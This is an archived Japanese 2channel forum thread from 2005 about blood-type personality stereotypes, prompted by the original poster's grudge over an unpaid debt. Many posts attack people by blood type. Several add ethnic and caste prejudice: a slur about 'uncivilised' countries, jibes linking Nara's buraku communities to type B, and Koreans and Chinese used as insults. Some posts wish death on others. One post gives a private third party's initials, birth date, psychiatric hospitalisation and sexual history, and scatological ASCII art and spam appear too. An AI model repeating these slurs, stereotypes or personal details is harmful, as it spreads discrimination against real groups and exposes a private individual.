2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

A型は自分の借金を他血に押し付ける2

1 :マドモアゼル名無しさん:2005/04/21(木) 20:03:07 ID:+9CpKaq0
いつまで逃げるか

2 ::2005/04/21(木) 20:04:32 ID:+9CpKaq0
まだ一円も返さず、知らんぷり

3 :マドモアゼル名無しさん:2005/04/21(木) 20:43:03 ID:+9CpKaq0
6 :マドモアゼル名無しさん :2005/04/21(木) 20:36:11 ID:s2BNb3s+
あの借金も取り立てられずウジウジこんな所で騒いでるチキンな奴?よく出てくるよなw。
あの乱発さ加減はOだね。





Bですが?下らない屁理屈は要りません。さっさと返しなさいよ?トロボーですか、A型
さん。


4 :マドモアゼル名無しさん:2005/04/21(木) 20:49:23 ID:ThBYLDcE
あなた

情けないタイプBだったのね 合掌

5 :マドモアゼル名無しさん:2005/04/21(木) 20:53:10 ID:isCiUpsc
バカは放置汁

6 ::2005/04/21(木) 20:58:31 ID:+9CpKaq0
屁理屈はもういい、返さないんだったら、覚えておけよ!

7 :あぼーん:あぼーん
あぼーん

8 :マドモアゼル名無しさん:2005/04/21(木) 21:30:26 ID:jT/qpAdI
>>6
取り返しにいけよw

9 ::2005/04/21(木) 22:11:21 ID:+9CpKaq0
>>8
精神病院に入っていて、面会させてもらえない。両親には、支払いの義務も
無いらしい。両親もウソ付きだし、金も持ってない。

10 :マドモアゼル名無しさん:2005/04/21(木) 22:18:22 ID:jT/qpAdI
>>9
まじかよ!
いくら貸したんだ?

11 :マドモアゼル名無しさん:2005/04/21(木) 22:22:04 ID:YN+P/Ydh
基本的にA型は浪費家。お金の使い方ヘタ。

12 :マドモアゼル名無しさん:2005/04/21(木) 22:33:33 ID:IUNbe/En
俺はOに踏み倒されたがよ。こんなスレ立てらねーよ。恥ずかしくて。


13 :マドモアゼル名無しさん:2005/04/21(木) 22:38:24 ID:AETHRkTN
>>1って、PLO=B型じゃねーの?

口調がそっくりだ。

14 :マドモアゼル名無しさん:2005/04/21(木) 22:52:15 ID:8m85aheq
そういえばPLO久しぶりに見たな。

15 ::2005/04/21(木) 23:17:24 ID:+9CpKaq0
>>10
52O万円。貸したというより、騙し取られた幹事。Aって、私には信用できない人に見えるけど、
占い本には信用度随一とか書いてあるから、清水の舞台から降りる気で貸してやったの!

結果、多数派だから良く書かれているだけと悟ったわ。本当は、一番アレだね…

16 :マドモアゼル名無しさん:2005/04/21(木) 23:19:33 ID:6HBYUyE4
占い本なんかに騙されたお前が悪い

17 :マドモアゼル名無しさん:2005/04/21(木) 23:20:27 ID:jT/qpAdI
>>15
踏み倒して良い金額じゃないな。。
取り返してからぶっ殺しだな

つかお前もお前だ、血液型の本にのってる内容を
鵜呑みにするのもどうかと思う。。。

18 ::2005/04/21(木) 23:22:29 ID:+9CpKaq0
ねえ、520万円って多い?少ない?

19 :マドモアゼル名無しさん:2005/04/21(木) 23:23:31 ID:jT/qpAdI
多すぎる。
つうかな、貸す前に考えろよw

20 :マドモアゼル名無しさん:2005/04/21(木) 23:26:03 ID:2/Uhz+Gk
俺もAに金貸したけど返ってこない。
そのくせそいつと遊ぶたびに俺の生き方や彼女について説教したり、
人の生き方に難癖つけてくる。
話すことは自分の壮絶な人生自慢。
返せ!って言ってるのに、今は手持ちがない、来週まで待って…
ってのびのびに。


21 :マドモアゼル名無しさん:2005/04/21(木) 23:28:57 ID:jT/qpAdI
まぁ、確かにせしめるだけせしめようとしてくるのがいるな
もっとびっくりなのがあんなショボイ奴らの被害にあう奴がいるとはな

22 :BO女蟹蟹 ◆.lfIYLeACA :2005/04/21(木) 23:29:35 ID:Cyujicit
>18
それは本人が決めることです。
こっちとしては、そこまで騙し取られるだけの金はありません。

http://hobby5.2ch.net/test/read.cgi/fortune/1101560799/l50
こういうの見ておいたほうがいいかも。
血液型を信じたばかりにそんな目にあい、そして血液型を叩いてたらそこから抜け出せないような気がする

詐欺の問題についてだけど、詐欺自体は警察に突き出せるけど、精神病院患者なら刑事責任を問われないからな、、
でも精神病だから金借りるというのはありえないよな

23 :BO女蟹蟹 ◆.lfIYLeACA :2005/04/21(木) 23:32:13 ID:Cyujicit
てか、本当に友達だと思ってたら金なんて出させたくない
5円足りないとか、そんなくらいならあげてもいいが。

24 ::2005/04/21(木) 23:32:52 ID:+9CpKaq0
でも、Aって恥知らずだよ。これも、父O−母ABが不動産をやっているから貸せる
額なの。で、ヤミ金の保証人にも勝手にされて合計が520万円ってこと。それこそ、
非Aの信用を全く裏切っても平気の平座。ヤミ金の取り立て電話は、父にも、私の職
場にも来たわ。もう、我が家も、私の職場も、そのAは出入り禁止だけどね。

25 :マドモアゼル名無しさん:2005/04/21(木) 23:34:30 ID:IUNbe/En
つうか普通におかしいだろ。
占い本に信用できるって書いてあったから貸したって・・
病的じゃね?

26 ::2005/04/21(木) 23:38:32 ID:+9CpKaq0
いや、これで、Aの本性は解ったから、もう貸さないよ。それと、旦那も非Aじゃ
なければ絶対嫌だね!

27 :マドモアゼル名無しさん:2005/04/21(木) 23:38:58 ID:jT/qpAdI
非Aという言葉を使うのは、みんなを味方にしたいのかなんなのか。
お前くらいだ。

28 :BO女蟹蟹 ◆.lfIYLeACA :2005/04/21(木) 23:40:50 ID:Cyujicit
>>24
たしかに借金してなぜか精神病院に入ってるなんておかしな話だね。
もし自分だったら恥ずかしいな。
でも「そいつ」じゃなくて、「A」の悪口をいうのはいただけないな。

恨みのある人間にだったら、1の話の中の男みたいなことしたいと思う。
でもそこまでの知恵もないんだな。

29 :マドモアゼル名無しさん:2005/04/21(木) 23:41:55 ID:jT/qpAdI
いや、Aの悪口はどんどん言って良い。
ただ、この件をみんなにわかってもらうのはちょっと厳しいな

30 :BO女蟹蟹 ◆.lfIYLeACA :2005/04/21(木) 23:43:10 ID:Cyujicit
>>26
行列法律相談で「B型とは絶対付き合わない」と言ってたA型と似てるよ…

こっちはAじゃなくても貸さないけどな。
てか俺が友達と認める人は、人に金出させるのを痛々しく思う人。

31 :マドモアゼル名無しさん:2005/04/21(木) 23:44:18 ID:jT/qpAdI
>Aじゃなくても貸さない
これだな。

32 ::2005/04/21(木) 23:47:29 ID:+9CpKaq0
>>27
私的には、B♀の伴侶は、

AB♂>O♂>B♂>>>>>>>>>>>>>>>>>>>>>>>>>>>>A♂

が良いと思うよ。離婚せず、一生、添い遂げるためにもね。

33 ::2005/04/21(木) 23:53:40 ID:+9CpKaq0
言い過ぎたかしら???でも、何とかせーよ、資本主義社会なんだからaさんよ!

34 :BO女蟹蟹 ◆.lfIYLeACA :2005/04/21(木) 23:56:41 ID:Cyujicit
数年前にも「B型に2000円貸して戻ってこない」と騒いでる人いたな
今度は何型が言われるんだろう

35 :マドモアゼル名無しさん:2005/04/21(木) 23:57:43 ID:jT/qpAdI
>>32
はうあっ、上位ランクイン!!!
それで良いんじゃあないか?
そーしなさい。

36 :マドモアゼル名無しさん:2005/04/21(木) 23:59:25 ID:jT/qpAdI
>>33
Aに騙されたお前が何を書いても
響かない気はするが。
コピペでも貼って回ったらどうだ?

37 :マドモアゼル名無しさん:2005/04/22(金) 00:00:44 ID:W2/zJySS
コピペなんてアホだろ

38 :マドモアゼル名無しさん:2005/04/22(金) 00:02:14 ID:CW8tEmMN
>>33
弁護士んとこでも何でもいけば?
俺もOにやられたっつったら、そう言われたし。
Aって言えば、他にも叩きが寄ってきてストレス解消にでもなるか?
それでも血に固執してんなら、相手と同じ病院にでも行けよ。


39 :マドモアゼル名無しさん:2005/04/22(金) 00:03:53 ID:84IcxZzG
>>34
俺の経験上では
B型に金を騙し取られるのは ABとOで
A型に金を騙し取られるのは Bで
O型に金を騙し取られるのは AとABで
AB型に金を騙し取られるのは Aだ。

弱肉強食みてーにグルグルと円を描くように
みーんな騙し取られてるんだろうな。

40 :マドモアゼル名無しさん:2005/04/22(金) 00:07:04 ID:84IcxZzG
>>37
つか、騙されたーなんてここで痛切な気持ちで書いてても
A型は見てない気がするんだ
マジどんなにここで訴えても意味が無い気がするぞ?

41 :BO女蟹蟹 ◆.lfIYLeACA :2005/04/22(金) 00:07:43 ID:fJuamcjv
>>39
そういや2000円騒動の当事者は「うお座O」と名乗ってた
でもうお座スレの人が、そのスレをあらしたおばちゃんと文が似てると言ってたから
本当ではなさそうだ

42 ::2005/04/22(金) 00:17:45 ID:DnZ0yPx4
>>41
Aは都合の悪い時は、Oになりすまし、B−O戦争を画策するのよ。
その手には、乗らない方が大人よ

43 :BO女蟹蟹 ◆.lfIYLeACA :2005/04/22(金) 00:19:00 ID:fJuamcjv
悪口を書くとき、大抵は自分の本当の血液型なんて書かないかもね

44 :マドモアゼル名無しさん:2005/04/22(金) 00:20:50 ID:84IcxZzG
だな。
>>42のような内容が言えるのならば
そもそも騙されはしまい。

45 :マドモアゼル名無しさん:2005/04/22(金) 00:21:53 ID:S11P91pD
このスレがネタって事?

46 :マドモアゼル名無しさん:2005/04/22(金) 00:26:35 ID:84IcxZzG
叩き合わせをしたかったのかなんなのか。

47 ::2005/04/22(金) 00:27:10 ID:DnZ0yPx4
そう思うんだ?、でも私は本当に真面目な人よ、そう思っただけ。うおOかも
知れないね?ヤダヤダ

48 :マドモアゼル名無しさん:2005/04/22(金) 00:28:23 ID:84IcxZzG
大丈夫か?
書いてる内容が支離滅裂だがw

49 :マドモアゼル名無しさん:2005/04/22(金) 00:30:33 ID:3g2CyUmy
ただストレス解消のためにスレ立てて言いたい事言ってるだけだろ。


50 :マドモアゼル名無しさん:2005/04/22(金) 00:39:23 ID:mBULaj58
怖すぎる…

51 ::2005/04/22(金) 00:43:20 ID:DnZ0yPx4
ネタじゃないよ.ホントだよ。話、変?ビール飲んでるから、思考力
アヤクシクナッテキタヨ!

52 :マドモアゼル名無しさん:2005/04/22(金) 00:45:08 ID:3g2CyUmy
実社会では全く相手にされないだろうな。
ただでさえここでもまともに相手にされてないのに。

53 :マドモアゼル名無しさん:2005/04/22(金) 00:45:43 ID:84IcxZzG
いや、もう良い。

54 :マドモアゼル名無しさん:2005/04/22(金) 00:46:16 ID:84IcxZzG
失礼
>>53>>1宛てね

55 ::2005/04/22(金) 00:48:38 ID:DnZ0yPx4
両親は、れっきとした不動産屋。
私は、れっきとしたOL。
ちゃんと実社会で認められていま
すよ


56 :マドモアゼル名無しさん:2005/04/22(金) 00:52:41 ID:3g2CyUmy
そうじゃなくてこのスレのような話は実社会でしたら相手に
されず恥かくだけだ。

57 ::2005/04/22(金) 00:58:38 ID:DnZ0yPx4
実社会の話です

58 :マドモアゼル名無しさん:2005/04/22(金) 01:04:12 ID:3g2CyUmy
しかし血液型と借金とか全く無関係。


59 :マドモアゼル名無しさん:2005/04/22(金) 01:05:19 ID:84IcxZzG
で、O型なの?AB型なの?

60 :マドモアゼル名無しさん:2005/04/22(金) 01:07:23 ID:mBULaj58
れっきとしたOLが金貸しの決断に占い本使うのか?
聞かれもしないのに父母の血液型とか言ってるし。血ヲタの極みじゃん。

61 :1:2005/04/22(金) 01:10:38 ID:DnZ0yPx4
だから、父O母ABの私Bですってば!
ちなみに、彼氏はABですよッ

62 :マドモアゼル名無しさん:2005/04/22(金) 01:13:45 ID:84IcxZzG
>>59は誤爆
ここに書いてたのか。

>>61
逆切れするような内容か?
変、妙、不思議。

63 :マドモアゼル名無しさん:2005/04/22(金) 01:17:31 ID:3g2CyUmy




ス  レ  立  て  る  事  で  も  無  い  の  に  ね






64 :1:2005/04/22(金) 01:20:26 ID:DnZ0yPx4
彼氏は、やはりお姉さんもBらしい。

65 :マドモアゼル名無しさん:2005/04/22(金) 12:42:43 ID:DnZ0yPx4
ID:UBJ2JCm、平日のお昼からコピペ上げ、ご苦労様です。


66 :マドモアゼル名無しさん:2005/04/22(金) 13:31:26 ID:8bHq6YvM
自分は常に貸す側のAだけど一番金を返さないのはやっぱりAだな
今までで逃げるし逆切れ・開き直りしたのがA、なんとか忘れさせようと逃げるのがAB、
単純に忘れてるのがO(言えばすぐ返してくれるしお礼も言う)、
で意外にBが返すのが遅れる時に連絡来るし、期限守るしお礼も言う。

自分の経験ではこんな感じだった

67 :マドモアゼル名無しさん:2005/04/22(金) 14:08:50 ID:dFI6Q7tp
B型最高!B型最高!!B型最高!!!B型最高!!!!
B型最高!B型最高!!B型最高!!!B型最高!!!!
B型最高!B型最高!!B型最高!!!B型最高!!!!
B型最高!B型最高!!B型最高!!!B型最高!!!!
B型最高!B型最高!!B型最高!!!B型最高!!!!
B型最高!B型最高!!B型最高!!!B型最高!!!!
B型最高!B型最高!!B型最高!!!B型最高!!!!
B型最高!B型最高!!B型最高!!!B型最高!!!!
B型最高!B型最高!!B型最高!!!B型最高!!!!
B型最高!B型最高!!B型最高!!!B型最高!!!!

B型イケメンばかり!B型イケメンばかり!!B型イケメンばかり!!!
B型イケメンばかり!B型イケメンばかり!!B型イケメンばかり!!!
B型イケメンばかり!B型イケメンばかり!!B型イケメンばかり!!!
B型イケメンばかり!B型イケメンばかり!!B型イケメンばかり!!!
B型イケメンばかり!B型イケメンばかり!!B型イケメンばかり!!!

68 :マドモアゼル名無しさん:2005/04/22(金) 17:23:07 ID:vS36Vbay
Aだけど。正直「はあ?」だよ。
んなバックレ野郎が全部Aだと思ってるのか?なんか怖…

69 :マドモアゼル名無しさん:2005/04/22(金) 17:51:30 ID:3KESx9+l
放っておけ。
書き方みりゃわかるだろ。まともじゃねぇんだから。

70 :BO女蟹蟹 ◆.lfIYLeACA :2005/04/22(金) 18:23:04 ID:fJuamcjv
>>32
好きな異性の血液型に対しては、自分の血型とすごく相性が良いと思ってしまうところあるかもね、人間って。


71 :マドモアゼル名無しさん:2005/04/22(金) 19:06:17 ID:RJEmLoaD
病的なやつばっかりだな。
あ、病気なのか。

72 :マドモアゼル名無しさん:2005/04/23(土) 01:49:12 ID:P+1KjCN4
奈良の「大音量おばさん」ってAぽくないか?

73 :マドモアゼル名無しさん:2005/04/23(土) 07:40:48 ID:XwRj3nV6
(・∀・)ウルセー血ヲタ

74 :マドモアゼル名無しさん:2005/04/23(土) 09:50:27 ID:nUjEOIK1
>>72
あんな大胆にやるところはAっぽくない。

75 :マドモアゼル名無しさん:2005/04/23(土) 09:52:50 ID:nw9SGqwv
>>72
あれはABだと思う

76 :マドモアゼル名無しさん:2005/04/23(土) 11:29:46 ID:OHZc3M+7
何型でもよい。糞スレあげんなや

77 :マドモアゼル名無しさん:2005/04/23(土) 12:58:15 ID:P+1KjCN4
A型が多いと、未開の土人国および発展途上の貧乏国になる

これ世界の現実






78 :マドモアゼル名無しさん:2005/04/23(土) 13:44:18 ID:TUH/ALbe
>>72
A型の場合は、自分の責任棚上げで陰口、表立った行動無し・・・じゃあないかな

79 :マドモアゼル名無しさん:2005/04/23(土) 13:56:59 ID:08FVwflv
叩かれても踏み付けられても俺達は立ち上がる。
そう、雑草のように

80 :マドモアゼル名無しさん:2005/04/23(土) 17:14:33 ID:YzTQPQR4
>>72
奈良の騒音ばあさんはB型の所業だろうw
あれはB型にしか出来んw

81 :マドモアゼル名無しさん:2005/04/23(土) 21:26:53 ID:P+1KjCN4
おらおら、A型さまの排便の時間だ
             ,|   .ノ   ,,丶   ,!   .|
            /   .|    .゙l    ,/`   l゙
               |    丶 _    .,!     ヽ
               >     ``‐.`ヽ、  .|、     |
             ゙'.     ,ト `i、  `i、    .、″
                |    .,.:/""  ゙‐,. `    /
             `  .,-''ヽ"`    ヽ,,,、   !
                、,、‐'゙l‐、      .丿 : ':、
               、/ヽヽ‐ヽ、;,,,,,,,,,-.ッ:''`  .,"-、
              ,r"ツぃ丶  ``````   ../  `i、
          ,.イ:、ヽ/ー`-、-ヽヽヽ、−´    .l゙`-、
         _,,l゙-:ヽ,;、、             、、丶  ゙i、,,、
        ,<_ l_ヽ冫`'`-、;,,,、、、、.............,,,,、.-`":    │ `i、
      、、::|、、、ヽ,、、.    ```: : : ```      、.、'`  .|丶、
     .l","ヽ、,"、,"'、ぃ、、,、、、、.、、、.、、、_、.,,.ヽ´    l゙  ゙).._
    ,、':゙l:、、`:ヽ、`:、  : `"```¬――'''"`゙^`     : ..、丶  .l゙ `ヽ     
   ,i´.、ヽ".、".、"'ヽヽ;,:、........、           、、...,,,、−‘`   、‐   |゙゙:‐, 
  ,.-l,i´.、".`ヽ,,,.".`   `゙゙'"`'-ー"``"``r-ー`'":      _.‐′  丿  ,!
 j".、'ヽ,".、".、"`''`ー、._、、、           、._,、..-‐:'''′   .、,:"  丿
 ゙l,"`"`''ヽヽ"`"`  ```゙'''"ヽ∠、、、、ぃ-`''''": `      、._./`  ._/`
  `'i`ヽヽヽ`''ーi、、、: :                   、.,-‐'`   、/`
   ``ヽン'`"`  : `~``―ヽ::,,,,,,,,,,.....................,,,,.ー'``^    ,、‐'"`
      `"'゙―-、,,,,..、、                 : ..,、ー'"'`
クソ同然の他血は、a型様のクソの下敷きになってろ!




82 :マドモアゼル名無しさん:2005/04/23(土) 21:43:14 ID:R4Yt6AU6
>>81
キモッ!
こんなAA貼るなよ。

83 :マドモアゼル名無しさん:2005/04/23(土) 23:01:51 ID:9xZoqnsf
77 :マドモアゼル名無しさん :2005/04/23(土) 12:58:15 ID:P+1KjCN4
A型が多いと、未開の土人国および発展途上の貧乏国になる

これ世界の現実


B・Oに僻み的書き込み。

84 :マドモアゼル名無しさん:2005/04/24(日) 00:29:28 ID:j573sPT9
>>80
いや!B型の漏れから言わせてもらえば
B型があんなに長く嫌がらせを続けるのは不可能だ!

飽きるか冷める。間違いなくww
ABだろあのおばはん

85 :マドモアゼル名無しさん:2005/04/24(日) 06:07:03 ID:w9l4lzOO
このスレ自体が捏造ですね。A型は真面目ですよ。
>>1はO型でしょう。

86 :1:2005/04/24(日) 08:23:24 ID:QeGCOqP7
>>85
よく、いけしゃ〜しゃ〜と、真面目だなんだと自己正当化のキレイごとが言えますね。
だから、ますます、A型さんは始末が悪く、憤激を覚えるのです。ここに書いたプロフ
ィールも全て真実なのに、よく否定できますね、A型は相当、図太い血液のようですね。
O型さんに責任転嫁するのもA型さんの特徴のようです。





兎に角、本当に、あくどいですね、A型さんは!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!

87 :1:2005/04/24(日) 08:32:20 ID:QeGCOqP7
ついでに言うなら、こんなところで言っても無駄かもしれませんが、ソイツと私の
実名や年齢、住所、電話番号も公表しても構いませんよ!

88 :1:2005/04/24(日) 09:07:31 ID:QeGCOqP7
何で、本当のこと言えば何の反応も無いのかね、A型サンよ!

89 :Aひつじ:2005/04/24(日) 09:39:11 ID:w9l4lzOO
>>87
公表するといって、しないところが捏造臭い。
で?>>1は何型?

90 :1:2005/04/24(日) 09:58:57 ID:QeGCOqP7
>>89
ある程度、プライバシーも考慮して、

ソイツ S・I♂ 昭和39年2月16日生まれ、A型、趣味:AV(出演経験あり)
    両親、兄、姉がいる。本人は、破産宣告済。精神病院入院中。

私   M・Y♀ 昭和53年7月13日生まれ、B型、趣味:絵を描くこと、読書
    両親、姉がいる。彼氏はAB。両親不動産業で、私はOL



91 ::2005/04/24(日) 11:08:29 ID:w9l4lzOO
>>90
それはそいつの血液型のせいではないなぁ・・・
マントラという密教の占いを知ってるか?
それで見たらソイツというのはよくあてはまるよ。

92 :マドモアゼル名無しさん:2005/04/24(日) 11:16:23 ID:w9l4lzOO
>>66
血液型に貸す貸金業でもしてんの?
そんなに血液型別にデーター取れるほど貸してるって嘘っぽい。
普通はみんな普通に返してくれるだろうよ。
返してもらえないなんてそんな何回もしかも全血液型である事なの?


93 :マドモアゼル名無しさん:2005/04/24(日) 11:25:15 ID:GYuZdOAc
もともと血なんかカンケーねーって言ってんだろ。
てめぇの勝手でクソスレ立ててんじゃねぇよ。
じゃあ俺はOに大金踏み倒されたからよ、てめぇの親父に責任取るように
言えや!O型さんなんだろ?
頼むぜ。

94 :マドモアゼル名無しさん:2005/04/24(日) 11:30:33 ID:w9l4lzOO
自分の経験ではお金を返してくれなかったのはO型だけ。
うっかり忘れる人が大半だけど千円くらいだと言い出しにくくて
そのままドロンされた事も多々ある。

O型がたち悪いと思うのは自分が借りた時は忘れるけど
自分が貸した時はキッチリ覚えてると言う事。
ひどい時は周りに○○は忘れてるフリをしてるとか言いふらす始末。
自分の時は小さい事でぐちゃぐちゃ言うなと言うのにね。

95 :マドモアゼル名無しさん:2005/04/24(日) 11:45:01 ID:GYuZdOAc
>>94
俺はそいつは憎いが別にO全部がそうだとは思ってねぇよ。
んなもん当たり前だ。
でも>>1がその血全部が悪いって言ってるからよ。
その理屈でいきゃ>>1の知り合いのOは俺に弁償してくれるって事だろ。
だから頼んだの。


96 :マドモアゼル名無しさん:2005/04/24(日) 14:20:22 ID:Xu+Ox+e6
もちろん返答してくれるだろ。
「真面目で社会的に認められたОL」なんだし。
AV男優と関係があるようだけどw

97 :1:2005/04/24(日) 15:41:47 ID:QeGCOqP7
そのA♂は、現に一銭も返していないんですよ。兄や姉に言っても(どちらもA)、身内でも
責任も取らず、赤の他人に迷惑かけて恥じないのです。A全部とは言わないけど、父方の
祖父もAであちこち借金して氏にました。父を騙して、大借金させたのもAです。
>>93の論理からいけば、Aもお金を返していないわけですから、父も返す必要は無いという
ことになります。

>>93>>95のAレスを見れば、AはOに騙されていることになります。そして、我が家では、
B、OはAに騙されています。



98 :マドモアゼル名無しさん:2005/04/24(日) 15:46:47 ID:wakk3QcI
どっちにしてもお前個人と周りの問題じゃん。
終了しろや。

99 :1:2005/04/24(日) 15:58:56 ID:QeGCOqP7
しかし、そのA♂は、精神病院に入る前は、憲法9条を守ろうとか、人生は
努力で決まるなどとキレイごとを言ってて、表面を繕うのは上手かった。
ただ、地球上の引力は場所によって違うとか、妙なことも逝っていた。頭も
弱かったのだろうか

100 :マドモアゼル名無しさん:2005/04/24(日) 18:14:09 ID:hKtjcdSs
>>80
ご明解!!
騒音おばさん(B型)といい、小林薫(B型)といい、
故 丘○誠○(AB型)といい、
奈良出身の犯罪者って、AB型とか特にB型って多いよね。

101 :マドモアゼル名無しさん:2005/04/24(日) 19:01:58 ID:JXjeS9ht
奈良は部落が多く、B型因子が多いという事実。

102 :マドモアゼル名無しさん:2005/04/24(日) 19:10:10 ID:kxgBezX7
             /::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::\   ..■■■■■■■■
            /:::::::::::::::::::ノ ̄ヘ::::::;―、::::::::::::::::::::::::ヘ  .■■■■■■■■■
          /:::::::::::;-' ̄     ̄    ̄ヘーァ:::::::::i  ■■       ■■■
          i:::::::::彡              ミ:::::::::::ヘ .■■      ■■■
          |:::::::メ   ........        ......,   ヾ:::::::::::| .■■■■■■■■■
          |:::ノ   /   ヽ    /   ヽ ミ::::::::::| ■■■■■■■■
          |::| /    _       _    ヾ::::::l .■■     ■■■
          |::|    イ(:::)ヽ     イ(:::)メ    |::::::| ■■       ■■■
          |ノ i    `ー'ノ i    ヽ` ~    イ::イ .■■        ■■■
          | j }    ~~  ノ;            い  ■■      ■■■■
          ゝ:.:.{: . : .    γ    ,、 )、      i丿 ..■■■■■■■■■
          厶:.:.ヾ : .    ` ''`  ~   ヽ     ノつ ■■■■■■■■
          /i:.:.:.:. : .       ,_    i    /
        /  ヘ:.:.:. : .  i   ハニエ!-!‐ヽ |    ,イゝ、__
      /|     ヘ:.: .  │〈.:.:.:.:.:.:.:.:.:.:ノ ノ    /   \:;:- 、 _
    /:;:;:;:;ヽ     ヽ   ! ヾエエEァ´     /      i:;:;:;:;:;:;:;\
  /:;:;:;:;:;:;:;:;:;:ヽ      \  ゝ、:::::::::::  '   ノ       |:;:;:;:;:;:;:;:;:;:;ヘ
/:;:;:;:;:;:;:;:;:;:;:;:;:;:;:;:;ヽ      \        /       /:;:;:;:;:;:;:;:;:;:;:;:;:;i

103 :マドモアゼル名無しさん:2005/04/24(日) 19:19:25 ID:LeTa8HXG
>>102
誰?

104 :マドモアゼル名無しさん:2005/04/25(月) 00:09:21 ID:jsxNpIUA
だいぶ前に出てたけど、
枚方の米谷喜夫とかいう脅威の血ヲタおじさんの話
もっと詳しく教えてほしいよ。

105 :A型羊:2005/04/25(月) 07:35:10 ID:02w20LsM
>>80>>100
ソースは?
あのおばさん。隣の住人以外には優しいんだよね。
あれはO型の仕業だと思うよ。

皆に平等にいやがらせ=B型
一部の人に異常にいじわる=O型

だからね。

106 :マドモアゼル名無しさん:2005/04/25(月) 07:54:53 ID:7WG8NNg1
ババァの話はいいよ、もう。

107 :マドモアゼル名無しさん:2005/04/25(月) 08:53:58 ID:02w20LsM
>>106
O型は都合が悪いと話を切り替える。

108 :マドモアゼル名無しさん:2005/04/25(月) 09:23:39 ID:jsxNpIUA
>>105
B型だろ?ひょっとしたらあんたも奈良の出身?
A型は基本的にはこのような書き込み絶対しないよ。
奈良の騒音おばさんがB型だというのは
ザワイドでもやってたよ。

109 :マドモアゼル名無しさん:2005/04/25(月) 09:42:21 ID:czPCDAnq
ウルセー糞Aども。都合の悪いことはすぐBやOやってよう言うわ!
不浄の身のしとるくせによく善人ぶれるな。どうせワシらもBO兄弟
やが、俺達もAなんてデェッ嫌いでAなんかにヘイコラセンデ。病気で
も何でもAAから早よ志んでクレンカ

110 :マドモアゼル名無しさん:2005/04/25(月) 10:30:43 ID:X6pH7B8I
>>109
おまいOにとっても恥ずかしい。
喋らないでくれ。

111 :マドモアゼル名無しさん:2005/04/25(月) 12:28:58 ID:02w20LsM
>>108
悪いけどA型だよ。ちなみに大阪出身だよ。
Bも嫌いだよ。Oも嫌い。
皆に平等にいやがらせ=B型
一部の人に異常にいじわる=O型

あんたはO型?A型に好かれてると思ってるの?
自信過剰がOらしいね。


112 :マドモアゼル名無しさん:2005/04/25(月) 12:37:34 ID:haEdEBe8
>>108>>109
こいつらは自分が好かれてると思ってる勘違い野郎O。
O型だというだけで好かれてると勘違いしてる恥ずかしい方のO型だ。
同じOにも同血を名乗って欲しくないと思われてる痛いO型。


113 :マドモアゼル名無しさん:2005/04/25(月) 12:41:45 ID:GHbTvuS+

  /\___/\
/ /    ヽ ::: \
| (●), 、(●)、 |    / ̄ ̄ ̄ ̄ ̄ ̄ ̄
|  ,,ノ(、_, )ヽ、,,   |  < ま〜た始まった
|   ,;‐=‐ヽ   .:::::|    \_______
\  `ニニ´  .:::/
/`ー‐--‐‐―´´\

114 :マドモアゼル名無しさん:2005/04/25(月) 12:43:08 ID:czPCDAnq
Aだけが嫌い。

115 :マドモアゼル名無しさん:2005/04/25(月) 12:47:45 ID:02w20LsM
>>108
いい事を教えてやろう。
>>114こういうのとか、>>108こういうのをB型っていうんだよ。

A型は半分くらいはBと同じくらいOもあまり好きじゃないぞ。
同じA型同士になるとA同士が一番心地良いって話になるんだよ。
自己中のB、傲慢なOってな。



116 :マドモアゼル名無しさん:2005/04/25(月) 12:50:03 ID:FguGFkEg
ロリコンのスター宮崎勤や小林薫と違う血液型で
良かった(*´∀`)
ロリコンのスター宮崎勤や小林薫と違う血液型で
良かった(*´∀`)
ロリコンのスター宮崎勤や小林薫と違う血液型で
良かった(*´∀`)
ロリコンのスター宮崎勤や小林薫と違う血液型で
良かった(*´∀`)
ロリコンのスター宮崎勤や小林薫と違う血液型で
良かった(*´∀`)
ロリコンのスター宮崎勤や小林薫と違う血液型で
良かった(*´∀`)
ロリコンのスター宮崎勤や小林薫と違う血液型で
良かった(*´∀`)
ロリコンのスター宮崎勤や小林薫と違う血液型で
良かった(*´∀`)
ロリコンのスター宮崎勤や小林薫と違う血液型で
良かった(*´∀`)


117 :マドモアゼル名無しさん:2005/04/25(月) 12:54:46 ID:02w20LsM
韓国人のBと違う血液型でよかった(*´∀`)
中国人のOと違う血液型でよかった(*´∀`)
韓国人のBと違う血液型でよかった(*´∀`)
中国人のOと違う血液型でよかった(*´∀`)
韓国人のBと違う血液型でよかった(*´∀`)
中国人のOと違う血液型でよかった(*´∀`)
韓国人のBと違う血液型でよかった(*´∀`)
中国人のOと違う血液型でよかった(*´∀`)

118 :マドモアゼル名無しさん:2005/04/25(月) 13:00:26 ID:haEdEBe8
騒音おばさんのBは、隠語のBとKのBじゃなかったのか。
いつから血液のBになったんだ?







まあB型でも関係ないけど。

119 :マドモアゼル名無しさん:2005/04/25(月) 13:03:25 ID:X6pH7B8I
血の話だけに血が騒ぐのか?w
もっと別の方向に余力を向けりゃいいのに・・
血の気が多いようだから皆献血でもしてくればぁ〜


120 :マドモアゼル名無しさん:2005/04/25(月) 13:04:20 ID:FguGFkEg
コピペされるたびにB型の評価が下がりますね! W


121 :マドモアゼル名無しさん:2005/04/25(月) 18:23:41 ID:jsxNpIUA
>>112
>>108のものだけど、
なんで俺がOなわけ?
ちなみに正真正銘のA型なんだけどね。
前後の空気で書き込みしているやつらの血液型ぐらい
読み取れよ!
このバカ!

122 :マドモアゼル名無しさん:2005/04/25(月) 19:16:12 ID:VlSgru3G
怒っちゃヤーヨ

123 :マドモアゼル名無しさん:2005/04/25(月) 19:30:53 ID:UV8j2/Zo
>>20
自分の知人にそっくりでビックリしました

124 :マドモアゼル名無しさん:2005/04/25(月) 19:36:46 ID:J3QlydNn
金かりる奴なんか、どれも似たようなもんだろ。

125 :マドモアゼル名無しさん:2005/04/25(月) 23:53:40 ID:jsxNpIUA
>>110>>109のことを勝手にO型だと勘違いしているようだけど、
残念だね、>>109はB型だよ。

>>111はただ単にA型にもO型にも恨みのあるB型。
それこそ>>109じゃないけれど、奈良出身の被差別B型か???

